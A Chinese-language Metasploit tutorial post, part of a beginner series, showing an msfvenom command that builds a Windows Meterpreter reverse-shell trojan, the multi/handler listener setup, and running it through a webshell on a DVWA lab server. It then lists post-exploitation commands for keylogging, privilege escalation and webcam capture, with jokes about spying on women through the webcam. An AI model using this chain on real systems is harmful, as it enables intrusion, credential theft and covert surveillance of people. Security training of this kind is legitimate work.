Metasploit入门系列(八)——Meterpreter(一)

题记:小姐姐,小姐姐,小姐姐……

上次有小伙伴私信我,想看关于Armitage在Windows平台下的使用,这里简单解释下,Armitage你可以把它看作一个壳,你的所有操作其实还是使用的msfconsole接口的命令行,我也安装过windows下的msf,但实在用的不是很习惯,想想还要自己配开源数据库postgresql,脑瓜疼,虽然我也提到Armitage确实提供了多平台版本,但为一个gui实在没必要太折腾。

明明鸟儿已经为你配置好啦一切,尽量还是放到linux上来吧。

小鸟用的好,局子进的早,嘤。

本期我们来简单介绍Meterpreter的一条龙使用,在后面的章节了我们会展开介绍Meterpreter下的基本命令及骚操作。

首先我们要明确一点,Meterpreter生成的payload,咳咳,木马就木马嘛,叫的那么好听QAQ。。。需要在目标服务器上成功运行是我们后续工作的基础,这就牵扯到了免杀的问题;然后目标服务器可能存在于内网内,并不具备公网ip,这就牵扯到了反弹shell的问题;再然后作为攻击者的你如果身处内网,如果你不具备路由管理的权限,然而又需要一个公网IP,那就牵扯到了反向代理的问题……

然后是跟团队大佬求证过的一个场景问题。如果我们是通过webshell上传的payload,那就牵扯到了提权的问题;如果我们是通过类似永恒之蓝等服务器漏洞拿到的shell,对于win7以上版本,可以考虑借助power shell下载我们放置于公网的payload,而对于纯cmd命令行环境,我们需要,,emmm,,尝试提权远程吧,如果你不嫌动静大的话;咳咳,或者干脆物理hack了解一下~

所以,我为什么要碰Meterpreter这个大坑!!!想想后边的内容都脑瓜疼= =。

今天呢,我们就来介绍下针对web应用的msf一条龙搞事情~

眼熟一下~此次的上传点选择DVWA吧,所在服务器是一台Windows server 2008R2。

成功上传webshell并上传,,,,,唉?我在干啥?我在哪?忘做木马啦~@。@

在很多相关教程中,大家可能看到如下命令:'msfpayload'(荷载生成器),'msfencoder'(编码器),'msfcli'(监听接口),这只能说,你看的教程可能过期了,如今的msf讲上述命令统一归置到了'msfvenom' 中。

此次我们的服务器目标十分明确,所以我们选择了针对Windows系统基于TCP的反弹shell:windows/meterpreter/reverse_tcp

使用msfvenom 生成我们所需要的payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.222.77 lport=1988 -f exe -o rabbit.exe

其次,我们需要在msf中配置对应的payload服务端,使用exploit/multi/handler模块:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp ##此次为所使用payload模块

set lhost 172.16.222.77##同payload设置内容

set lport 1988##同payload设置内容

刚刚我们也提到了,这是反向shell,所以在运行后我们讲开启怼本地所设置端口的监听,等待木马上线。

回到我们webshell的二次上传工作:

通过webshell运行木马。

我们可以看到,客户端已经上线,已拿到目标服务器shell。

我们之前就提到过,Meterpreter是一种特殊的shell code(payload),它究竟有多么强大呢?

#screenshot屏幕截图

#keyscan_start键盘记录开启

#keyscan_stop键盘记录关闭

#getsystem获得系统管理员权限

#sysinfo计算机操作系统和名称等的详细信息

#webcam_snap#通过摄像头拍照,emmm,算了,偶尔爆次照吧。

#webcam_stream#通过摄像头开启视频,emmm,这个不需要解释啦,这才是我们本篇攻略的重点好不好!简直撩小姐姐必备。

当然啦,Meterpreter的功能远远不止这些。关于它的针对不同系统不同协议的不同模块,以及各种常用命令介绍,我们放在后续的章节。真心希望更多的小伙伴可以受益于此。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20181123G1GHBV00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券

年度创作总结 领取年终奖励